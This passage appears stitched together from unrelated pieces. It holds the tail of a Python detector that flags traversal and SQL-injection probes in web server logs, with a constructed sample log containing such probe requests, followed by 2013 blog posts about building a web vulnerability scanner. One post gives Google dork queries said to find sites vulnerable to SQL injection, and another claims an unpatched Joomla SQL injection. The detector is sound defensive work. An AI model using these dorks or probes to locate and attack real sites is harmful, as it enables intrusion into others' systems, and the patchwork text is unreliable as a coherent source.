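                   '/phpinfo.php', '/wp-admin/', '/install/', '/admincp/'}
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|/etc/passwd|/proc/self/environ', re.I)
SQLI_META_RE = re.compile(r"'.*?(/\*|--|#)")  # applied to the decoded query string

def parse_line(line):
    """Parse one combined-format line; None when the line does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    e = m.groupdict()
    e['status'] = int(e['status'])
    e['ts'] = datetime.strptime(e['ts'], '%d/%b/%Y:%H:%M:%S %z')
    e['decoded'] = unquote(e['target'])  # %27 -> ' and %2e%2e -> ..
    return e

def tags_for(e):
    """Per-request indicators; each is weak alone, the combination matters."""
    path, _, query = e['decoded'].partition('?')
    tags = set()
    if path in SENSITIVE_PATHS:
        tags.add('sensitive-path')
    if TRAVERSAL_RE.search(e['decoded']):
        tags.add('traversal')
    if SQLI_META_RE.search(query):
        tags.add('sqli-meta')
    if e['ua'].startswith('Python-urllib'):  # default User-Agent of the urllib module
        tags.add('script-ua')
    return tags

def detect(lines, burst=8, window_s=60, min_sensitive=3):
    """Return {ip: {'requests': n, 'tags': {...}, 'alerts': [...]}} per client."""
    per_ip = defaultdict(lambda: {'entries': [], 'tags': Counter()})
    for e in filter(None, map(parse_line, lines)):
        per_ip[e['ip']]['entries'].append(e)
        per_ip[e['ip']]['tags'].update(tags_for(e))
    report = {}
    for ip, info in per_ip.items():
        alerts, tags = [], info['tags']
        # Sliding window over 403/404 timestamps: a wordlist run is a burst of misses.
        misses = sorted(x['ts'] for x in info['entries'] if x['status'] in (403, 404))
        lo = 0
        for hi in range(len(misses)):
            while (misses[hi] - misses[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= burst:
                alerts.append('dir-enumeration')
                break
        if tags['sensitive-path'] >= min_sensitive:
            alerts.append('sensitive-paths')
        if tags['traversal']:
            alerts.append('lfi-probe')
        if tags['sqli-meta']:
            alerts.append('sqli-probe')
        report[ip] = {'requests': len(info['entries']), 'tags': dict(tags), 'alerts': alerts}
    return report

def _log(ip, sec, target, status, ua):  # one constructed line, 19/Mar/2013 10:01:<sec>
    return ('%s - - [19/Mar/2013:10:01:%02d +0000] "GET %s HTTP/1.1" %d 209 "-" "%s"'
            % (ip, sec, target, status, ua))

PY_UA, BROWSER_UA = 'Python-urllib/1.17', 'Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0'
SAMPLE_LOG = [_log('203.0.113.5', 2 * i, t, s, PY_UA) for i, (t, s) in enumerate([
    ('/config.php', 404), ('/config/', 404), ('/doc/', 404), ('/install/', 404),
    ('/admincp/', 404), ('/phpMyAdmin/', 404), ('/phpmyadmin/', 404), ('/pma/', 404),
    ('/wp-admin/', 403), ('/server-status', 403), ('/plugins/', 200),
    ('/page.php?file=../../../../etc/passwd', 200), ('/index.php?id=1%27/**', 500)])
] + [_log('198.51.100.7', 5, '/', 200, BROWSER_UA),
     _log('198.51.100.7', 9, '/sitemap.xml', 200, BROWSER_UA),
     _log('198.51.100.7', 12, '/favicon.ico', 404, BROWSER_UA),
     _log('198.51.100.7', 30, '/search?q=O%27Brien', 200, BROWSER_UA)]

if __name__ == '__main__':
    for ip, r in sorted(detect(SAMPLE_LOG).items()):
        print(ip, r['requests'], 'requests; alerts:', ', '.join(r['alerts']) or 'none')
```

On the constructed sample the scanning client gets all four alerts while the browsing client gets none; with real logs, feed `detect()` the lines of a log file and review per-IP tags before treating a single indicator as an alert.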
Wednesday, 13 March 2013
[EN] Modules in your own web scanner - #1
Soon... ;]
As soon as possible you will find here also:
- xss over GET 'test module'
- xss over POST 'test module'
- directory traversal/LFI 'test module' - (@10/02)
- sql injection 'test module' - (@19/03)*
- dir-finder 'module' - (@10/02)
- (... still in progress ;])
- and some information gathering 'module'
The 'to do' is of course a GUI version, but who knows, maybe for now I will stay with the console-based version.
Anyway... *After a few minutes of using the 'sqli-test' module I found a '0day vulnerability' in some 'random-checked' Joomla module (an SQL injection vuln), so it's also useful for searching for this kind of bug.*
*20.03.2013 - update*
As you can see, a few modules are here today. Let me know about any feedback/ideas/questions.
Thanks!
o/
Tuesday, 5 March 2013
[EN] Why it is good to turn off error display
This is a foobar temporary name, not for some 'how to 1,2,3' tutorial, but
for a tutorial on 'how to think about possibilities of vulnerability'.
Questions?
No? thanks. Go.
Trick 1. What is the purpose?
Answer: Cash. Hacktivism. Stupidity.
Trick 2. Most 'common' ways of hacking?
In my opinion the most dangerous bugs are the input-vulnerability kind of bugs
(code/PHP injections, other RCE - I'm calling it all 'rce' ;)).
So 'most dangerous' and 'most simple to re-script'.
Trick 3. No sample, just an idea.
'What if' an attacker goes to the google.com search bar, and a few ideas about
how to combine the parameters of 'google-hacks' to find _really_ useful things
change your site into one of those already 'h4ck3d'?
hm...
ok. ;]
simple arsenal: 5 parameters:
(param:example)#
site:com # find sites.COM
site:com -site:com.br # find sites.COM without .com.br
site:org intext:findme # find all sites.ORG with 'findme' word
ext:php # find all php type of files (extensions)
intitle:motel # find all pages contains 'title' with motel word
Great.
If you have some knowledge about writing PHP pages,
you can get a few simple ideas right now.
As a coder you have seen 'a few times' some error messages,
for example 'Error in line...' whatever.
Remember those errors from MySQL? ;>
Maybe this simple example will refresh your memory:
site:r0x intext:"SQL.Syntax" ext:php intext:error
ok not bad, but not so good also. ;)
Upgrade:
intext:"SQL.Syntax" ext:php intext:error inurl:".php?*=2"site:stillr0x
This google-dork actually gives you 'a few' sites vulnerable to SQL injection attacks,
so be patient and think about what you're doing. If you're doing anything with these ideas,
do NOT do bad things and remember to test them only against your own sites.
Remember. ;)
More? here.
o/
[EN] Hello, I'm looking for a job.
After 4 months of recruitment at RBS... I'm not too good to work there.
Practical knowledge is worse than certificates in a resume.
Yeah, yeah, but one question:
Malware or a 14-year-old hacker from Japan has no certs either, but they can still hack and take down your company.
Think twice about ignorant HRs.
"Hey Shimomura! Your kung-fu the best!"